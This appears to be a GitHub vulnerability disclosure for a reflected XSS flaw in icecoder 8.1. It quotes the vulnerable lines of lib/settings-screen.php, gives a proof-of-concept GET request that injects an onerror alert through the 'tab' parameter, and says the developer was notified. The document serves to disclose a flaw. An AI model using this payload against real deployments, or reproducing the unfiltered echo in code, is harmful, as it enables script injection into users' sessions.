Skip to content

Latest commit

 

History

History
30 lines (18 loc) · 774 Bytes

icecoder8.1_xss2.md

File metadata and controls

30 lines (18 loc) · 774 Bytes

A xss vulnerability in icecoder 8.1.

In file lib/settings-screen.php

...
if (true === isset($_GET['tab'])) {
    $tabSwitchExtra = "switchTab('" . $_GET['tab'] . "');";		// Line 42 (Source)
}
...
<body class="settings" onkeyup="parent.ICEcoder.handleModalKeyUp(event, 'settings')" onload="<?php echo $tabSwitchExtra;?>this.focus();">	// Line 50(Sink)

Source from $_GET['tab'] and without any filtering, which resulting in XSS.

Poc

GET /lib/settings-screen.php?tab=style%27)%22%20onerror=%22alert(%27xss%27)%22%20(%27&csrf=f64d3d95dc4af18766d285ff437e4d4f

The value of csrf can access from index.php

Manual verification

alt text

alt text

The developer has been informed of the report via email